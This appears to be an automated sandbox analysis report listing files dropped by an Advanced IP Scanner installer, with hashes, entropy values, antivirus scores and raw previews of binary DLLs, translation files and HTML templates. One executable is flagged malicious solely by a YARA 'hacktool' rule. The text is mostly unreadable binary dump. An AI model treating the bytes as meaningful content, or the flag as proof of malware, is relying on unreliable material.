                                                                                                                                                                                                  SHA-256:5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
                                                                                                                                                                                                  SHA-512:8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3..*.y.....*.y.....*.%...F.*.0...q.+.......+.....*.+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&......*..5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-D3SJ5.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1169
                                                                                                                                                                                                  Entropy (8bit):4.842737243338588
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
                                                                                                                                                                                                  MD5:59A017F97EA0743C741E972819CFEA19
                                                                                                                                                                                                  SHA1:E6480E68B930A8595EACBAC255B3BFAFCC30D466
                                                                                                                                                                                                  SHA-256:71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
                                                                                                                                                                                                  SHA-512:95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-DLE8L.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.961849079425489
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
                                                                                                                                                                                                  MD5:8F8A47617DFD829A63E3EC4AFF2718D9
                                                                                                                                                                                                  SHA1:1D7DC26BB9C78C4499514FB3529B3478AECF7340
                                                                                                                                                                                                  SHA-256:6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
                                                                                                                                                                                                  SHA-512:D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-DMEE5.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28507
                                                                                                                                                                                                  Entropy (8bit):4.623752380391833
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+SMpoU+mEzzXQeqk2clHV//QY8BjefWOUxDid8KeDO33wE4:e6DmEzzX/qk2c9V//QZevUmk
                                                                                                                                                                                                  MD5:C576730007E97DD3B8F3C46FFF0F6DDD
                                                                                                                                                                                                  SHA1:311DF6FDB52905E3FFA80494FE0E1E7534060155
                                                                                                                                                                                                  SHA-256:F01DC02F68D88631535D8010960C2F306FCF07FC69F4A8113BF1A1D70130D001
                                                                                                                                                                                                  SHA-512:427751E2D8A84878837DEE345A22CC7AA3ADB0E8B40113C39E61038444121700142F56B73536FCF9AC5D150253277390AA9BEC08B29C408089C9C04E932BE89C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[,...;.......;.......;.......;..!....;..E....O..^....[..Y....^..1....^..U...(5......G.......H,..R~..K...A...N:......V...F..._..._P......).......R....y..S.......................[....t..+k...t..S....t..]......B....j......5t......@...D...H5..[...f...1I......G................!...~..4T...`..9"...e..])......]Q.......N. =...H..*.y.....*.y...Q.*.%..%..*.0..%..+.....Y.+.......+......+......+....'].G.... ..G....+..H0...]..Hw9.....Hw9.....I....)Z.J6......J6.... .J6......J6...K..LD......L.b..]..M.S..C..R.......V....1q.Wi...\..W.T.....Z.|..T[.[f3..X8.gc....^.w0K..J...H...&i......^....T...c..."..6Z...~..8... d..H3...T../Q..2...........\:......b..9.E..B,.L.#..e-.M$o.....e.......l8...8S...^..K...I...........D.......U9......[...>......>......3..0...l...M,......;..5.l..a..AV...)..y....Z3...0..V.......T.......[...tb..7$.......)..............V.......?.......Q..(....U..1V...*@.R....35.W.<..b..f.~..".......5...1....E...^..7....5...S..........c..H..;6...c..q.J..Q...I....O..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-DMJVK.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6708264
                                                                                                                                                                                                  Entropy (8bit):6.661851136227646
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
                                                                                                                                                                                                  MD5:1FBE59E9BE0F445BB14BE02C0EE69D6F
                                                                                                                                                                                                  SHA1:98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
                                                                                                                                                                                                  SHA-256:F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
                                                                                                                                                                                                  SHA-512:00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../|..B}.|/|..B}..*|..B}..B|.#G}.|/y..B}.|/x..C}.|/}..B}.|/...B}..B.B}.|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-DORH9.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):300584
                                                                                                                                                                                                  Entropy (8bit):5.864906645133905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
                                                                                                                                                                                                  MD5:E8D9421848C1DDEA1A74EBFDBE452C67
                                                                                                                                                                                                  SHA1:7F1302F2B64FF785ABF85F5A9579EA12E555233B
                                                                                                                                                                                                  SHA-256:3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
                                                                                                                                                                                                  SHA-512:2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.HYT..YT..YT...<..[T...<..ST...<..ST...<..ZT..P,..PT..YT..oT...=..LT...=..XT...=x.XT...=..XT..RichYT..........................PE..L...Ki.]...........!.........t......O........ ............................................@..........................`..r......x.......<............z..(.......,....U..8............................U..@............................................text............................... ..`.rdata...E... ...F..................@..@.data...,....p.......R..............@....idata...............T..............@..@.00cfg...............^..............@..@.rsrc...<............`..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-DQL0L.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1159
                                                                                                                                                                                                  Entropy (8bit):4.88658440484172
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
                                                                                                                                                                                                  MD5:E133CA274E9A1C5B55A9AE459656E935
                                                                                                                                                                                                  SHA1:B115F78BD0BA440A10A2ED5093712D7675F3E45C
                                                                                                                                                                                                  SHA-256:D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
                                                                                                                                                                                                  SHA-512:CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-EGB7D.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1155
                                                                                                                                                                                                  Entropy (8bit):4.803303336966706
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
                                                                                                                                                                                                  MD5:27C167C1E5624DC7F4D0256ABAA8632F
                                                                                                                                                                                                  SHA1:7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
                                                                                                                                                                                                  SHA-256:E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
                                                                                                                                                                                                  SHA-512:C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stare:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem de operare:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produc.tor:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilizator:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tip:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dat.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarii:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Serviciu</center></b></td><td><b><center>Detalii</

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-EI8EF.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):590271
                                                                                                                                                                                                  Entropy (8bit):7.998650752150742
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
                                                                                                                                                                                                  MD5:637FB65A1755C4B6DC1E0428E69B634E
                                                                                                                                                                                                  SHA1:FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
                                                                                                                                                                                                  SHA-256:B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
                                                                                                                                                                                                  SHA-512:F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-EM5VK.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21282
                                                                                                                                                                                                  Entropy (8bit):5.593895866111406
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
                                                                                                                                                                                                  MD5:6885AC8F42A02A32B59AA84D330925C3
                                                                                                                                                                                                  SHA1:A070B4B8BF1128197681487D332168A537107FB9
                                                                                                                                                                                                  SHA-256:2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
                                                                                                                                                                                                  SHA-512:4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3..*.y.....*.y.....*.%.....*.0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-ET1Q4.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.9718846004654225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
                                                                                                                                                                                                  MD5:B8BB783DEE4EA95576882625C365E616
                                                                                                                                                                                                  SHA1:E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
                                                                                                                                                                                                  SHA-256:21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
                                                                                                                                                                                                  SHA-512:B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-ET38G.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80128
                                                                                                                                                                                                  Entropy (8bit):6.906674531653877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                                                                                                                                  MD5:1B171F9A428C44ACF85F89989007C328
                                                                                                                                                                                                  SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                                                                                                                                  SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                                                                                                                                  SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1681960
                                                                                                                                                                                                  Entropy (8bit):6.535592110075899
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
                                                                                                                                                                                                  MD5:B3411927CC7CD05E02BA64B2A789BBDE
                                                                                                                                                                                                  SHA1:B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
                                                                                                                                                                                                  SHA-256:4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
                                                                                                                                                                                                  SHA-512:732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_AdvancedIPScannerHacktool, Description: Yara detected Advanced IP Scanner Hacktool, Source: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-FHLQP.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27099
                                                                                                                                                                                                  Entropy (8bit):4.717079738585517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
                                                                                                                                                                                                  MD5:58ACBFB46226E1833250D5F5A7CE7D6E
                                                                                                                                                                                                  SHA1:5711848C2E2E5D5144B5F965A0F856611773A7F4
                                                                                                                                                                                                  SHA-256:7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
                                                                                                                                                                                                  SHA-512:DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5|...e..W.......X.......... =...DI.*.y.....*.y.....*.%..#..*.0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-FJ29J.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                                  Entropy (8bit):4.808850143987916
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouisuSPXqBQqHJl4/0Kt5RGDz9cReEhyv:HnisRPXqWqHJlK0U2Dz9+s
                                                                                                                                                                                                  MD5:3A9608446029B501A8C31084CA170B0E
                                                                                                                                                                                                  SHA1:E6643513E77B23997112741963B24C60EB4DF08C
